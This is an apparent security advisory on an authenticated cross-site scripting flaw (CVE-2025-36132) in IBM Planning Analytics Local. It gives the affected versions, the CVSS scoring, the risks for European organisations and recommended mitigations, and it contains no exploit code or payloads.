CVE-2025-36132 is a medium-severity cross-site scripting (XSS) vulnerability affecting IBM Planning Analytics Local versions 2.0.0 through 2.0.106 and 2.1.0 through 2.1.13. The vulnerability arises from improper neutralization of input during web page generation (CWE-79), allowing an authenticated user to inject arbitrary JavaScript code into the web user interface. This injected script executes within the context of the trusted session, potentially altering the intended functionality of the application. The exploitation requires the attacker to have valid credentials (authenticated user) and some user interaction (UI:R). The vulnerability has a CVSS 3.1 base score of 5.4, reflecting a medium severity level. The attack vector is network-based (AV:N), with low attack complexity (AC:L), and privileges required are low (PR:L). The scope is changed (S:C), meaning the vulnerability affects resources beyond the initially vulnerable component. The impact affects confidentiality and integrity (C:L, I:L) but not availability (A:N). Although no known exploits are currently reported in the wild, the vulnerability could lead to credential disclosure or session hijacking if exploited, as the attacker can execute scripts that manipulate the web UI or steal sensitive data within the trusted session. IBM Planning Analytics Local is a business analytics and planning software used by enterprises for financial and operational planning, making this vulnerability relevant for organizations relying on this product for critical business functions.

For European organizations using IBM Planning Analytics Local, this vulnerability poses a risk to the confidentiality and integrity of sensitive financial and operational data. An attacker with valid user credentials could exploit the XSS flaw to execute malicious scripts that may steal session tokens, credentials, or manipulate data displayed in the web interface. This could lead to unauthorized data disclosure, fraudulent financial reporting, or unauthorized changes to planning data. Given the nature of the product, such impacts could disrupt business decision-making processes and damage organizational trust. Additionally, if exploited in a multi-tenant environment or where sensitive personal data is processed, this could have regulatory implications under GDPR, potentially resulting in fines and reputational damage. The requirement for authentication limits the attack surface to insiders or compromised accounts, but the low complexity and network accessibility mean that phishing or credential theft could facilitate exploitation. The absence of known exploits suggests that immediate widespread attacks are unlikely but does not preclude targeted attacks against high-value European enterprises.

To mitigate this vulnerability, European organizations should: 1) Immediately verify and apply any available patches or updates from IBM once released, as no patch links are currently provided. 2) Enforce strict access controls and monitor user accounts for suspicious activity to reduce the risk of credential compromise, since exploitation requires authentication. 3) Implement web application firewalls (WAFs) with custom rules to detect and block malicious script injections targeting the IBM Planning Analytics Local web UI. 4) Conduct regular security awareness training to prevent phishing attacks that could lead to credential theft. 5) Review and harden input validation and output encoding configurations in the application environment if customization is possible. 6) Monitor logs and network traffic for unusual patterns indicative of XSS exploitation attempts. 7) Consider isolating the IBM Planning Analytics Local environment from less trusted networks and restrict access to trusted users only. 8) Prepare incident response plans specifically addressing potential XSS exploitation scenarios to minimize impact if an attack occurs.